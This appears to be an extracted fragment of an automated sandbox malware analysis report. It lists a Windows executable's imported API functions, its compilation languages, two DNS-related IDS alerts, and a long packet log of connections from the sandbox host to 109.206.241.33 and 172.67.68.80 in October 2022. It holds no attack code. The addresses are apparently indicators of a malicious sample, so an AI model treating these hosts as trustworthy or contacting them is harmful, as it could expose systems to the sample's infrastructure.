                                                                                                                                                                                                                                    ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                                                    KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                                                    GDI32.dllGetDeviceCaps
                                                                                                                                                                                                                                    USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                                                    msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                                                    COMCTL32.dll
                                                                                                                                                                                                                                    Cabinet.dll
                                                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                    RussianRussia
                                                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    192.168.11.201.1.1.153457532027757 10/04/22-07:11:10.317756UDP2027757ET DNS Query for .to TLD5345753192.168.11.201.1.1.1
                                                                                                                                                                                                                                    192.168.11.2034.142.181.18160830532014702 10/04/22-07:10:26.141908UDP2014702ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Opcode 8 through 15 set6083053192.168.11.2034.142.181.181
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.102519989 CEST4983480192.168.11.20109.206.241.33
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.126158953 CEST8049834109.206.241.33192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.126398087 CEST4983480192.168.11.20109.206.241.33
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.127063990 CEST4983480192.168.11.20109.206.241.33
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.150973082 CEST8049834109.206.241.33192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.151151896 CEST4983480192.168.11.20109.206.241.33
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.152302027 CEST4983480192.168.11.20109.206.241.33
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.174971104 CEST8049834109.206.241.33192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.174982071 CEST8049834109.206.241.33192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.175247908 CEST4983480192.168.11.20109.206.241.33
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.311506987 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.311522961 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.311666012 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.325356007 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.325366020 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.350826979 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.351249933 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.464987040 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.465245008 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.465455055 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.468662024 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.493957996 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.493999958 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494036913 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494107962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494182110 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494198084 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494208097 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494246006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494261026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494306087 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494313955 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494405031 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494411945 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494522095 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494530916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494585037 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494592905 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494632959 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494640112 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494699001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494712114 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494802952 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494854927 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494862080 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494903088 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494932890 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.494999886 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495013952 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495022058 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495115995 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495178938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495187044 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495290041 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495311022 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495321035 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495389938 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.495536089 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503423929 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503629923 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503638983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503710032 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503773928 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503792048 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503798962 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503921986 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503935099 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.503963947 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504012108 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504019022 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504061937 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504143000 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504152060 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504228115 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504318953 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504327059 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504329920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504394054 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504400015 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504416943 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504512072 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504580975 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504751921 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504760981 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504764080 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504767895 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504770994 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.504925013 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.505033016 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.511863947 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.511981964 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.512125969 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.512154102 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.512187004 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.512307882 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.512317896 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.512447119 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.512505054 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513298988 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513458014 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513469934 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513539076 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513560057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513658047 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513735056 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513739109 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513744116 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513830900 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513838053 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513894081 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513930082 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.513937950 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514067888 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514070034 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514081001 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514132977 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514139891 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514255047 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514348984 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514358044 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514399052 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514406919 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514457941 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514538050 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514545918 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514643908 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514653921 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514723063 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514770985 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514777899 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.514985085 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515006065 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515026093 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515162945 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515168905 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515330076 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515330076 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515337944 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515446901 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515453100 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515551090 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515664101 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515671968 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515711069 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515760899 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515834093 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515841007 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515983105 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.515990019 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.516086102 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.516093016 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.516292095 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.516310930 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.516318083 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.516599894 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.516681910 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.526748896 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.526763916 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.526951075 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.526958942 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.527021885 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.527138948 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529165030 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529175043 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529251099 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529295921 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529356003 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529459953 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529467106 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529514074 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529540062 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529663086 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529783964 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529788971 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529901028 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.529903889 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530242920 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530250072 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530253887 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530422926 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530428886 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530756950 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530765057 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.530865908 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.531191111 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.531224966 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.531234026 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.531400919 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.531512022 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.536652088 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.536664009 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.536797047 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.536957979 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.536967993 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.536971092 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537147045 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537266016 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537277937 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537416935 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537465096 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537472010 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537514925 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537579060 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537750006 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537864923 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.537878036 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538048983 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538070917 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538079023 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538136005 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538234949 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538316965 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538407087 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538414955 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538422108 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538464069 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538592100 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538604975 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538613081 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538830042 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538853884 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.538863897 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539047003 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539053917 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539068937 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539154053 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539239883 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539247036 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539357901 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539398909 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539405107 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539478064 CEST49835443192.168.11.20172.67.68.80
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539542913 CEST44349835172.67.68.80192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:05.539555073 CEST44349835172.67.68.80192.168.11.20
